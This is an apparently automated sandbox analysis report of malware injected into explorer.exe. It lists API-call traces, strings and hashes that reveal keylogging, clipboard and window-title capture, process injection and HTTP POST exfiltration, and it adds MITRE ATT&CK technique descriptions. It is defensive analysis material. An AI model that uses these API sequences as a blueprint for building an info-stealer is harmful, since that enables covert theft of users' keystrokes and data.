WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02D51AB2
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D51AC5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51ACC
Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51AD3
WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02D51AE7
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02D51AFE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51B0B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51B11
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 02D51B17
CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D51B1A

Strings

atan, xrefs: 02D51A61
ntdll, xrefs: 02D51A66
opera_shared_counter, xrefs: 02D51A31

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
String ID: atan$ntdll$opera_shared_counter
API String ID: 1066286714-2737717697
Opcode ID: 88db4f92f20844b9433b1940d5c5f27080d5eaeb43c4e542bc29983c394459f8
Instruction ID: e5225db457e56ba1666ca3ecfac90e531fb7032104fedb9b3e91e688a9c11d4f
Opcode Fuzzy Hash: 88db4f92f20844b9433b1940d5c5f27080d5eaeb43c4e542bc29983c394459f8
Instruction Fuzzy Hash: F3617B71A44365AFDB50DF289C84E6BBBEDEF89794F000959F94993340DBA0DD04CB62

Function 02D52799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68
encryptionstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02D527B5
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02D527CD
lstrlen.KERNEL32(?,00000000), ref: 02D527D5
CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02D527E0
CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02D527FA
wsprintfA.USER32 ref: 02D52811
CryptDestroyHash.ADVAPI32(?), ref: 02D5282A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02D52834

Strings

%02X, xrefs: 02D5280B

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
String ID: %02X
API String ID: 3341110664-436463671
Opcode ID: 655c5cdeca29055038d6aa125c4a6aee41e155cfba23067d1c52c4e4b11bee86
Instruction ID: c632627e831f1d3159331fa39ba0c1c3b9cf250d50d2f32f4cc8ae4ec364a722
Opcode Fuzzy Hash: 655c5cdeca29055038d6aa125c4a6aee41e155cfba23067d1c52c4e4b11bee86
Instruction Fuzzy Hash: C2115171D40218BFDB519FA9DC48EAEBF7CEF44355F2044A5F905D2200D7B14E559B60

Function 02D5162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 02D51652
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 02D5167A

Strings

, xrefs: 02D51699

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: KeyboardStateUnicode
String ID:
API String ID: 3453085656-3916222277
Opcode ID: 661f65d2ec45e60c42557923e186276aa720ea52eb324122621a93f8f5bef9e5
Instruction ID: 28579b40f05b97a9eee8ef2ec1a8a13f3a0da29081e747e0dbd7895e1ad935bd
Opcode Fuzzy Hash: 661f65d2ec45e60c42557923e186276aa720ea52eb324122621a93f8f5bef9e5
Instruction Fuzzy Hash: C3016D32D002699ADF34DA65D985BBB73FCAF45B04F08441AED09A2240D7B0ED49CAA2

Function 02D513AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlZeroMemory.NTDLL(02D55013,0000001C), ref: 02D513C8
VirtualQuery.KERNEL32(02D513AE,?,0000001C), ref: 02D513DA
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02D5140B
GetCurrentProcessId.KERNEL32(00000004), ref: 02D5141C
wsprintfA.USER32 ref: 02D51433
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02D51448
GetLastError.KERNEL32 ref: 02D5144E
RtlInitializeCriticalSection.NTDLL(02D5582C), ref: 02D51465
Sleep.KERNEL32(000001F4), ref: 02D51489
GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 02D514A6
GetProcAddress.KERNEL32(00000000), ref: 02D514AF
GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 02D514D0
GetProcAddress.KERNEL32(00000000), ref: 02D514D3
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02D514F1
CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 02D5150D
CloseHandle.KERNEL32(00000000), ref: 02D51514
RtlExitUserThread.NTDLL(00000000), ref: 02D5152A

Strings

user32.dll, xrefs: 02D514A1, 02D514CB
TranslateMessage, xrefs: 02D5149C
kernel32.dll, xrefs: 02D514EC
%s%d%d%d, xrefs: 02D5142D
GetClipboardData, xrefs: 02D514C6

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
API String ID: 3628807430-1779906909
Opcode ID: 499550e3e21a31d41b8d7a336987db1c79ffee8072c19a0832517ebe80ca3108
Instruction ID: 0778643c709492c97f6e40b91fbf1ba8a40d041c57d2a4192bf641dd69f6b2b5
Opcode Fuzzy Hash: 499550e3e21a31d41b8d7a336987db1c79ffee8072c19a0832517ebe80ca3108
Instruction Fuzzy Hash: 7541A070E80334ABEF51AF69BC59A1A3BA9EF44795B504858FD0686340DBF5DC188BB0

Function 02D516B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(02D5582C), ref: 02D516C4
lstrlenW.KERNEL32 ref: 02D516DB
lstrlenW.KERNEL32 ref: 02D516F3
wsprintfW.USER32 ref: 02D51743
GetForegroundWindow.USER32 ref: 02D5174E
GetWindowTextW.USER32(00000000,02D55850,00000800), ref: 02D51767
GetClassNameW.USER32(00000000,02D55850,00000800), ref: 02D51774
lstrcmpW.KERNEL32(02D55020,02D55850), ref: 02D51781
lstrcpyW.KERNEL32(02D55020,02D55850), ref: 02D5178D
wsprintfW.USER32 ref: 02D517AD
lstrcatW.KERNEL32 ref: 02D517C6
RtlLeaveCriticalSection.NTDLL(02D5582C), ref: 02D517D3

Strings

%s%s%s%s, xrefs: 02D517A2
%s%s%s, xrefs: 02D51738
Clipboard -> , xrefs: 02D51730
New Window Caption -> , xrefs: 02D5179A

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
API String ID: 2651329914-3371406555
Opcode ID: 8f5638f6ac77f61a2416489b80d2785820cde2a299127bf9f5e28ba194ce444c
Instruction ID: 5138c5b8ce8c1c05da6c3d9b4deb79653be1aebd46c7dfffdef6748e41067168
Opcode Fuzzy Hash: 8f5638f6ac77f61a2416489b80d2785820cde2a299127bf9f5e28ba194ce444c
Instruction Fuzzy Hash: 3F214F30980334EBEB622B2DFC88F2B3B59EB41A957544864FC0592305DAE5DC25CAB5

Function 02D525F1 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 02D52603
GetCurrentThreadId.KERNEL32 ref: 02D5260B
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02D5261B
Thread32First.KERNEL32(00000000,0000001C), ref: 02D52629
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02D52648
SuspendThread.KERNEL32(00000000), ref: 02D52658
CloseHandle.KERNEL32(00000000), ref: 02D52667
Thread32Next.KERNEL32(00000000,0000001C), ref: 02D52677
CloseHandle.KERNEL32(00000000), ref: 02D52682

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: e79530dca19ba69afa4420387c490db8f6d572a2b5560d86d59fee8acd12f5f4
Instruction ID: b23e65e63c1651fcc7004d3ba7bab3e678bf73f477849f40cf199f52e468fcb1
Opcode Fuzzy Hash: e79530dca19ba69afa4420387c490db8f6d572a2b5560d86d59fee8acd12f5f4
Instruction Fuzzy Hash: EB117032C44360EFDB419F64A84CA6FBBE4EF44791F140899FD4692340D7B08D29CBA2

Function 02D520A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13

Part of subcall function 02D5298A: lstrlen.KERNEL32(02D54FE2,?,00000000,00000000,02D520DD,74DE8A60,02D54FE2,00000000), ref: 02D52992
Part of subcall function 02D5298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02D54FE2,00000001,00000000,00000000), ref: 02D529A4

Part of subcall function 02D524CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02D524DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 02D52139
wsprintfW.USER32 ref: 02D52272
wsprintfW.USER32 ref: 02D522DD
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02D523A7

Strings

Host: %s, xrefs: 02D522D7
Accept: */*Referer: %S, xrefs: 02D52268
Content-Type: application/x-www-form-urlencoded, xrefs: 02D52301
POST, xrefs: 02D52223

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: ef8aa9c9b4f77252f571bd4e3cb0984d907560a7605af6afd87097fae1db38a7
Instruction ID: 1cd51b633585d9b66b2f06d32ff48559853e67c2ef0155bff054f0a7ee39d216
Opcode Fuzzy Hash: ef8aa9c9b4f77252f571bd4e3cb0984d907560a7605af6afd87097fae1db38a7
Instruction Fuzzy Hash: E7A14C71508365AFDB509F689888A2BBBE9EB88744F00082DFD85D7350DBB4DD18CF62

Function 02D512AE Relevance: 7.6, APIs: 5, Instructions: 93
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02D529BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,02D512D9,00000000,00000000,?,00000001), ref: 02D529C7

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 02D512DC

Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13

PathMatchSpecA.SHLWAPI(?,00000000), ref: 02D5138A

Part of subcall function 02D52841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02D51119,00000001), ref: 02D52850
Part of subcall function 02D52841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02D51119,00000001), ref: 02D52855

RtlZeroMemory.NTDLL(00000000,00000104), ref: 02D51316
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02D51332

Part of subcall function 02D52569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,02D5136E), ref: 02D52591
Part of subcall function 02D52569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 02D5259A

RtlMoveMemory.NTDLL(00000000,?,?), ref: 02D5135F

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
String ID:
API String ID: 2993730741-0
Opcode ID: abe6acd89e9010535deeb6b9c4ef37afc3f34ca5bc43cb0879edc2a2a096acec
Instruction ID: b29aee955f2bc22967ac823053ebf18cac654933704977532453592963939fcc
Opcode Fuzzy Hash: abe6acd89e9010535deeb6b9c4ef37afc3f34ca5bc43cb0879edc2a2a096acec
Instruction Fuzzy Hash: 83215370B043219F9B04EE689864A7FB7DAEB84754F10092EFC95D3740DBB4DD498A62

Function 02D51581 Relevance: 7.6, APIs: 5, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalLock.KERNEL32(00000000), ref: 02D515A9
lstrlenW.KERNEL32(00000000), ref: 02D515C6
lstrcatW.KERNEL32(00000000,00000000), ref: 02D515DC
lstrlenW.KERNEL32(00000000), ref: 02D51600
GlobalUnlock.KERNEL32(00000000), ref: 02D5161C

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Globallstrlen$LockUnlocklstrcat
String ID:
API String ID: 1114890469-0
Opcode ID: fda4c34073f8f4277f6d94f8583e3fa3c3232c4d92f0a978256fb7bf2011494e
Instruction ID: 7f29b0463f6047ba6366a441dbf4278ed5e15841e15ea5e49631ab18c97ef6ce
Opcode Fuzzy Hash: fda4c34073f8f4277f6d94f8583e3fa3c3232c4d92f0a978256fb7bf2011494e
Instruction Fuzzy Hash: A301A532E402715B9E656A7D689877E63BEDFC5255B084565EC0E92300DFF4CC16C660

Function 02D51BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 02D51BF4
LoadLibraryA.KERNEL32(?,02D55848,00000000,00000000,74DF2EE0,00000000,02D519B6,?,?,?,00000001,?,00000000), ref: 02D51C1C
GetProcAddress.KERNEL32(00000000,-00000002), ref: 02D51C49
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02D51C9A

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 4feb61105108d7c9b67a696fe965bfc2effbea2a94a06caeb9dcb27907806e22
Instruction ID: 2c283f0c92ce3e3d4cf40468f21a7a802ffec592e978e9bec9ad491afcc4350f
Opcode Fuzzy Hash: 4feb61105108d7c9b67a696fe965bfc2effbea2a94a06caeb9dcb27907806e22
Instruction Fuzzy Hash: D9317C71600626ABCF188F29C884B76F7A8BF15259F54456CEC9ACB300D7B2EC55DBA0

Function 02D5182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(02D5582C), ref: 02D51839
lstrlenW.KERNEL32 ref: 02D51845
RtlLeaveCriticalSection.NTDLL(02D5582C), ref: 02D518A9
Sleep.KERNEL32(00007530), ref: 02D518B4

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID:
API String ID: 2134730579-0
Opcode ID: aa041e41527603fcc2dac47f81ced645f8aa4eb5caa974c80c6d398c357041bf
Instruction ID: 11f8ae154a6a720f85450898dedebfa37cbc050b08e772c645758c190b763165
Opcode Fuzzy Hash: aa041e41527603fcc2dac47f81ced645f8aa4eb5caa974c80c6d398c357041bf
Instruction Fuzzy Hash: 86018F30D90330ABDB666B69EC5CA2E3BAAEF417517600418EC0586380DBF4CD19DFB2

Function 02D526C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,02D511DD), ref: 02D526DB
IsWow64Process.KERNEL32(000000FF,?), ref: 02D526ED
IsWow64Process.KERNEL32(00000000,?), ref: 02D52700
CloseHandle.KERNEL32(00000000), ref: 02D52716

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 905055d8b412025919e4e84ba7cd6a6b96ac58df66d3bf320f6f982f6fd42ac8
Instruction ID: 9db35ddd7fb3409f85ceb9e554c5c2f9bee36c0bcbd511aaa6062d89eb5d5b7e
Opcode Fuzzy Hash: 905055d8b412025919e4e84ba7cd6a6b96ac58df66d3bf320f6f982f6fd42ac8
Instruction Fuzzy Hash: DAF09072C42338FF9F50CFA49D499AEB7BCEE05295B2002AAED0093340D7B08E14D6A0

Function 02D517DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02D52A09: GetProcessHeap.KERNEL32(00000008,0000A000,02D510BF), ref: 02D52A0C
Part of subcall function 02D52A09: RtlAllocateHeap.NTDLL(00000000), ref: 02D52A13

GetLocalTime.KERNEL32(?,00000000), ref: 02D517F3
wsprintfW.USER32 ref: 02D5181D

Strings

[%02d.%02d.%d %02d:%02d:%02d], xrefs: 02D51817

Memory Dump Source

Source File: 0000001B.00000002.3006742816.0000000002D51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d51000_explorer.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: [%02d.%02d.%d %02d:%02d:%02d]
API String ID: 377395780-613334611
Opcode ID: 4817677bbf3543e0d55baca29b83a35a879161d5efca44d71f0a3478201de2c1
Instruction ID: a303ddde6c1df4029342fb474915446966f65452476bbd6b6582c3c282ad35ea
Opcode Fuzzy Hash: 4817677bbf3543e0d55baca29b83a35a879161d5efca44d71f0a3478201de2c1
Instruction Fuzzy Hash: 04F01261900138BA9B545BD99C458BEB3FCEA08742B00058AFE51D1140E5B85D60D3B5

Analysis Process: explorer.exePID: 2164, Parent PID: 2580COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00AB370C Relevance: 1.6, APIs: 1, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00AB378C

Memory Dump Source

Source File: 0000001C.00000002.3006402988.0000000000AB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_ab1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction ID: 8f9b32f447e3888f16aa98ddf7d323815796c84e86ed31d9fc94defaf7a58b4e
Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction Fuzzy Hash: C711C8746019094FFF58FBB8989D3B537D9F714312F544029E815C72A3EE3A8A818700

Function 00AB34C4 Relevance: 10.7, APIs: 7, Instructions: 195
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AB1BF8: OpenFileMappingA.KERNEL32 ref: 00AB1C0F
Part of subcall function 00AB1BF8: MapViewOfFile.KERNELBASE ref: 00AB1C2E

CreateToolhelp32Snapshot.KERNEL32 ref: 00AB35B7
Process32First.KERNEL32 ref: 00AB35DA
CharLowerA.USER32 ref: 00AB35EE
Process32Next.KERNEL32 ref: 00AB36CD
CloseHandle.KERNELBASE ref: 00AB36DE
SysFreeMap.PGOCR ref: 00AB36F7
SleepEx.KERNELBASE ref: 00AB3701

Memory Dump Source

Source File: 0000001C.00000002.3006402988.0000000000AB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_ab1000_explorer.jbxd

Similarity

API ID: FileProcess32$CharCloseCreateFirstFreeHandleLowerMappingNextOpenSleepSnapshotToolhelp32View
String ID:
API String ID: 2386764625-0
Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction ID: 759251131a6eb6421a1057a63610ac4d8b01566b9a0622ff25a9a7c5ddf35251
Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction Fuzzy Hash: B7519731218A084FDB19FB68D9A96EB73E9FB94310F844619E457C72A3DF38DA058781

Function 00ABB4A8 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00ABB5A7
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00ABB651
VirtualProtect.KERNELBASE ref: 00ABB66F

Memory Dump Source

Source File: 0000001C.00000002.3006402988.0000000000ABA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00ABA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_aba000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction ID: 29d3467dbcf0f49e2e8cdf5c70eaafd8558553910dd55ac3f6d154cf172454aa
Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction Fuzzy Hash: A351583267491D4ACB34AB389C842F4B7D9F755325B58072AC49BC3287E7A9C84683A2

Function 00AB1BF8 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 00AB1C0F
MapViewOfFile.KERNELBASE ref: 00AB1C2E

Memory Dump Source

Source File: 0000001C.00000002.3006402988.0000000000AB1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AB1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_ab1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction ID: 6496b011b2a6339773023a097afebb1fd5a8a6cf580366f400d38abe7480b64e
Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction Fuzzy Hash: 30F01234314F4D4FAB45EF7C9C9C136B7E1EBA8202744857A985AC6165EF34C8458711

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

